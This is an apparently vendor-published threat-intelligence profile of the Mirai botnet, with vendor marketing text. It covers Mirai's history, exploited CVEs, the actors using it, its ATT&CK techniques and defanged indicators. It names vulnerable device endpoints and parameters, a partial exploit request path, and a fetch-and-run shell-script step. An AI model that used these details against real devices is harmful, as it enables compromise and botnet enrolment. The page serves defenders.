Mirai
Mirai is a Linux/IoT malware botnet best known for infecting internet-exposed IoT devices using default or weak credentials, especially via Telnet, and enrolling them into command-and-control infrastructure for distributed denial-of-service attacks. The content specifically describes Mirai operators scanning the internet for IoT devices such as IP-connected security cameras and DVRs and compromising them at scale by logging in with factory credentials that had not been changed. Mirai was a defining example of insecure IoT exploitation in 2016, when it caused major disruption including the Dyn-related East Coast internet outage, and variants are still circulating nearly a decade later.
The malware targets Linux-based embedded systems and broader IoT/network edge devices. Across the provided content, Mirai and Mirai-derived variants are associated with routers, modems, IP cameras, NVRs, DVRs, NAS devices, Android-based devices, and other embedded platforms. Multiple reports note multi-architecture support and widespread code reuse from the original source, enabling both skilled and unskilled actors to produce new variants.
Observed infection vectors in the content include brute-forcing Telnet and SSH with weak credentials; exploitation of exposed services and known vulnerabilities such as CVE-2021-27137 in DD-WRT UPnP, CVE-2022-22954, CVE-2023-1389 in TP-Link Archer AX21 routers, CVE-2017-5638 in Apache Struts, GPON flaws CVE-2018-10561 and CVE-2018-10562, and Log4Shell/CVE-2021-44228; and active exploitation of hosting/control-panel flaws including CVE-2026-48172 in the LiteSpeed User-End cPanel Plugin and references to CVE-2026-41940 being used to drop Mirai and ransomware. Typical Mirai-based behavior noted in the content includes internet scanning, downloader/execution chains, architecture-specific payload deployment, C2 beaconing, and DDoS functionality. One cited description states Mirai-infected devices are controlled by a CnC server and used to launch DDoS attacks. Another notes that typical Mirai-based botnets often do not survive reboot, although variants continue to reinfect vulnerable devices.
The content links Mirai to numerous derivative or related botnets and campaigns, including LiquorBot, Aquabot, Satori/Okiru, Sora, Nosedive, and multiple unnamed Mirai variants. Mirai-derived tooling is described as being reused in campaigns targeting both consumer IoT and enterprise-facing systems. A Mirai variant called Nosedive is identified as the primary payload in the Chinese-linked Raptor Train botnet, which the FBI and Black Lotus Labs linked to Flax Typhoon and reported had infected more than 260,000 networking and IoT devices globally. Other reporting in the content notes Mirai botnet variants being deployed alongside ransomware, exploitation of Log4j by Mirai, and Mirai-family infrastructure participating in DDoS activity during the Russia-Ukraine conflict.
High-confidence indicators and detections directly mentioned in the content include Fortinet detections such as ELF/Mirai.EGX!tr and Linux/Mirai.Y!tr.bdr, and infrastructure references from specific Mirai-related reporting including l[.]ocalhost[.]host:47883, 5.182.211.5, 209.141.33.208, linuxuclib[.]com:8080, and jbeupq84v7.2y[.]net. The content also notes Mirai’s original encryption scheme key 0xdeadf00d in one variant analysis.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
33 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet | LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection vulnerability via the mac, time1, and time2 parameters at /goform/set_LimitClient_cfg.
CISA has added CVE-2026-48172 to its Known Exploited Vulnerabilities catalog, confirming active exploitation in the wild. The flaw is a maximum-severity privilege escalation vulnerability (CVSS v4.0: 10.0) residing in the LiteSpeed User-End cPanel Plugin versions 2.3 through 2.4.4... Active exploitation has been observed deploying Mirai botnet variants and a ransomware strain called “Sorry.” | Active exploitation has been observed deploying Mirai botnet variants and a ransomware strain called “Sorry.”
Itai Goldman, co-founder and CTO at Miggo Security, added that in the first case with CVE-2026-41940, a critical 9.8 cPanel bug was weaponized to drop Mirai and ransomware at scale across the same hosting stack. | Krell added that CVE-2026-41940 compromised approximately 44,000 cPanel servers less than a month ago. Itai Goldman added that in the first case with CVE-2026-41940, a critical 9.8 cPanel bug was weaponized to drop Mirai and ransomware at scale across the same hosting stack.
The primary vulnerability at the center of the event and this review (CVE-2021-44228) will be known as the Log4j vulnerability... Analysts at the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) assessed CVE-2021-44228 as a critical vulnerability with a Common Vulnerability Scoring System (CVSS) Base Score of 10.0. | Cisco Talos observed the Internet-of-Things botnet known as Mirai exploiting Log4j;
We observed several instances of CVE-2022-22954 being exploited to drop variants of the Mirai malware. | CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.
Instead, they were either non-specific Mirai variants or contained previously known exploits such as CVE-2017-17215. | We observed several instances of CVE-2022-22954 being exploited to drop variants of the Mirai malware.
Researchers warn the observed payloads share similarities to those found in malware used in Mirai-like botnets. | The Cybersecurity and Infrastructure Security Agency previously added the command injection vulnerability, tracked as CVE-2023-33538, to its Known Exploited Vulnerabilities catalog in July 2025. Palo Alto Networks telemetry detected large-scale exploitation attempts at the time.
Following that, cybersecurity teams warned about multiple botnets, including three Mirai variants ... that targeted unpatched devices. | Tracked as CVE-2023-1389, the flaw is a high-severity unauthenticated command injection problem in the locale API reachable through the TP-Link Archer AX21 web management interface.
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These variants are notable for two reasons: The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017. | CVE-2017-6884 Zyxel routers GET /cgi-bin/luci/... nslookup ? ...
This led to their participation in a Thingbot (a botnet built out of IoT devices) named Mirai that launched massive distributed denial-of-service (DDoS) attacks against a handful of victims, including Dyn, OVH, KrebsOnSecurity, and Rutgers University in late 2016. | The Janit0r took it upon himself to destroy IoT devices so they couldn’t become infected by Mirai, starting with the “colossally dangerous CVE-2016-10372 situation.” The situation referenced was considered dangerous because it allowed attackers to send remote commands to affected devices from anywhere on the Internet (WAN port) and then reconfigure the devices to allow further remote access.
The exploit targeting Apache Struts in the new variant we found targets CVE-2017-5638, an arbitrary command execution vulnerability via crafted Content-Type, Content-Disposition, or Content-Length HTTP headers. | Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These variants are notable for two reasons: The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These variants are notable for two reasons: The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017. | CVE-2018-10561, CVE-2018-10562 Dasan GPON routers Similar to previous campaigns.
Gigabit-capable Passive Optical Network (GPON) routers manufactured by DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws that eventually allow remote attackers to take full control of the device. | Mirai Botnet (new variants) — GPON exploit has also been integrated into a few new variants (operated by different hacking groups) of the infamous Mirai IoT botnet, which was first emerged and open-sourced in 2016 after it was used to launch record-breaking DDoS attacks.
Researchers have uncovered an active Mirai botnet campaign exploiting CVE-2025-29635, a command-injection vulnerability in legacy D-Link DIR-823X routers, to recruit internet-exposed devices into a distributed denial-of-service (DDoS) botnet. | Researchers have uncovered an active Mirai botnet campaign exploiting CVE-2025-29635... Attackers deploy a Mirai malware variant known as “tuxnokill,” which establishes command-and-control (C2) communication, spreads to additional vulnerable IoT devices, and prepares infected systems for large-scale DDoS operations.
The first major wave of such activity was exemplified by the Mirai botnet, which demonstrated how trivial authentication weaknesses could generate terabit-scale attacks targeting global infrastructure.
The first major wave of such activity was exemplified by the Mirai botnet, which demonstrated how trivial authentication weaknesses could generate terabit-scale attacks targeting global infrastructure.
CVE-2022-36553: A command injection vulnerability in the popen.cgi component of Hytec Inter HWL-2511-SS devices allows an authenticated attacker to execute arbitrary commands.
CVE-2025-9528: A vulnerability in the Linksys E1700 router's systemCommand function allows an authenticated remote attacker to perform OS command injection.
CVE-2024-3721: A critical command injection vulnerability in certain TBK DVR models allows an unauthenticated remote attacker to execute arbitrary commands via crafted HTTP requests.
CVE-2025-4008: A command injection vulnerability in the web interface of Meteobridge allows a remote, unauthenticated attacker to execute arbitrary commands with root privileges.
CVE-2025-34043: A remote command injection vulnerability in Vacron Network Video Recorder (NVR) devices allows unauthenticated attackers to execute arbitrary commands on the operating system.
CVE-2014-3206: Seagate BlackArmor NAS products are vulnerable to remote command execution via the session and auth_name parameters in certain web endpoints.
CVE-2020-10987: The setUsbUnload endpoint in Tenda AC15 and AC1900 routers contains a command injection vulnerability that allows an unauthenticated remote attacker to execute arbitrary system commands.
CVE-2020-9054: A command injection vulnerability in the weblogin.cgi component of multiple Zyxel NAS products allows an unauthenticated remote attacker to execute arbitrary OS commands.
CVE-2024-10914: An unauthenticated remote command injection vulnerability in legacy D-Link NAS devices, particularly in the account_mgr.cgi script, allows an attacker to execute arbitrary shell commands.
CVE-2023-41011: A command execution vulnerability in the shortcut_telnet.cg component of the China Mobile Intelligent Home Gateway v.HG6543C4 allows a remote attacker to execute arbitrary code.
CVE-2013-1599: A command injection vulnerability in the rtpd.cgi component of D-Link IP Cameras allows an unauthenticated remote attacker to execute arbitrary commands via a crafted query string.
CVE-2023-23333: A command injection vulnerability in downloader.php within SolarView Compact devices allows an unauthenticated remote attacker to execute arbitrary commands.
CVE-2022-40619: A firewall authentication bypass vulnerability affects FortiGate, FortiProxy, and FortiSwitchManager, allowing an attacker to perform operations on the administrative interface.
the first exploit used by Okiru is linked to the CVE-2014-8361... Devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection attacks in the UPnP SOAP interface.
Black Lotus Labs notes that the botnet was also involved in exploitation attempts against Atlassian Confluence servers and Ivanti Connect Secure appliances (likely via CVE-2024-21887) at organizations in the same activity sectors.
Researchers at VulnCheck flagged in-the-wild exploitation of CVE-2018-5999, a critical flaw carrying a 9.8 CVSS score, to the RondoDox botnet... VulnCheck began observing exploitation of the Asus vulnerability on May 17. 'Public exploits have been available since 2018,' ... 'But until now, we hadn't seen the vulnerability exploited in the wild.'
CVE-2024-41710 is a command injection vulnerability that affects Mitel 6800, 6900, and 6900w series SIP phones, including the 6970 Conference Unit through R6.4.0.HF1 (R6.4.0.136)... Akamai SIRT detected exploit attempts targeting this vulnerability through our global network of honeypots in early January 2025... This payload will attempt to fetch and execute a shell script called “bin.sh”, which will in turn fetch and execute Mirai malware on the target system.
Groups observed using it
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
FBI Director Chris Wray last Wednesday disclosed an operation to disrupt a Mirai-variant botnet that has exploited more than 260,000 IoT devices globally.
The operator -- a Chinese-speaking actor using the handle angelalk21 (QQ: 597118859, Telegram: @Kuru_x86) -- runs a Mirai-fork botnet with a novel DNS byte-swap anti-analysis technique that causes passive DNS researchers to track decoy IPs in Japan and the US while the real C2 sits in Germany.
...ultimately deploying the Mirai botnet malware and other DDoS-related programs on compromised devices and servers.
Hackers are exploiting vulnerabilities in end-of-life GeoVision IoT devices and Samsung’s MagicINFO server to expand the Mirai botnet... Akamai observed attacks in April targeting GeoVision devices... to download and run an ARM variant of Mirai dubbed LZRD.
They have employed botnets such as those based on DieNet or Mirai variants for DDoS attacks...
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
2 techniquesvendors like one cybersecurity technology services company observed the use of botnets to automate the reconnaissance process to quickly identify vulnerable targets
Five days following the flaw’s disclosure, Cloudflare observed 400 exploitation attempts per second, totaling millions of scanning attempts to identify vulnerable systems.
Resource Development
2 techniquesBlack Lotus Labs began an investigation into compromised routers that led to the discovery of a large, multi-tiered botnet consisting of small office/home office (SOHO) and IoT devices... We call this botnet “Raptor Train.”
Mirai’s operators scanned the internet for IoT devices, including large numbers of IP-connected security cameras and DVRs, and compromised them at scale... Those compromised cameras were recruited into a botnet...
Initial Access
2 techniquesMirai’s operators scanned the internet for IoT devices, including large numbers of IP-connected security cameras and DVRs, and compromised them at scale by logging in with factory credentials that had never been changed.
Krell added that CVE-2026-41940 compromised approximately 44,000 cPanel servers less than a month ago, so a second critical zero-day in the same ecosystem is a pattern.
Execution
3 techniquesThere is no race condition to win, nor an authentication gap to bridge — a single malformed API call with the right parameter values is sufficient to escalate to root.
The attack begins with a compact shell script called Universal Bot Downloader that automatically identifies the victim system’s CPU architecture using the uname -m command.
Analysts at the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) assessed CVE-2021-44228 as a critical vulnerability with a Common Vulnerability Scoring System (CVSS) Base Score of 10.0... This reflected the fact that exploitation of the flaw required low attack complexity, no privilege requirements, and no user interaction.
Persistence
1 techniquePrivilege Escalation
2 techniquesFirmware had no update path. And in 2016, Mirai – a botnet that exploited exactly those weaknesses – tore through connected devices worldwide.
Stealth
1 techniqueCredential Access
1 techniqueour research’s contribution lies in confirmatory validation: combining theoretical insights from prior literature with direct observation of real-world attack patterns to confirm the persistence of known behaviors, including credential brute-forcing, Mirai-style commands, and Telnet dominance
Discovery
2 techniquesMirai’s operators scanned the internet for IoT devices, including large numbers of IP-connected security cameras and DVRs...
The most frequent command was uname -s -v -n -r -m... Additional commands queried /proc/uptime and /proc/cpuinfo, counted processor cores using grep and wc -l, and inspected the operating system with uname -a and whoami.
Lateral Movement
1 techniqueloader/ Infects vulnerable devices using telnet brute-force
Command and Control
3 techniquesOver the years, IoT botnets have evolved from centralized command-and-control (C2) models toward resilient peer-to-peer infrastructures designed to sustain operations even after partial takedowns.
The binary protocol used by Condi to communicate with the C2 server is a modified version of that initially implemented in Mirai.
Itai Goldman, co-founder and CTO at Miggo Security, added that in the first case with CVE-2026-41940, a critical 9.8 cPanel bug was weaponized to drop Mirai and ransomware at scale across the same hosting stack.
Impact
2 techniquesA variant of Mirai called LiquorBot was used for cryptocurrency mining.
Those compromised cameras were recruited into a botnet used to launch some of the largest distributed denial-of-service attacks ever recorded, including the October 2016 attack against Dyn that took down Twitter, Reddit, Netflix, and large portions of internet infrastructure for hours.
IOCs tracked for this family
443 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced only via antivirus detection naming in the report; no direct behavioral discussion is provided.
IoT botnet that compromised internet-exposed devices such as security cameras and DVRs using unchanged factory credentials, then recruited them to launch large-scale distributed denial-of-service attacks.
Botnet malware whose variants are being deployed through exploitation of CVE-2026-48172 on vulnerable LiteSpeed User-End cPanel Plugin installations.
Mirai was reportedly deployed at scale via exploitation of a critical cPanel vulnerability in the hosting stack.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.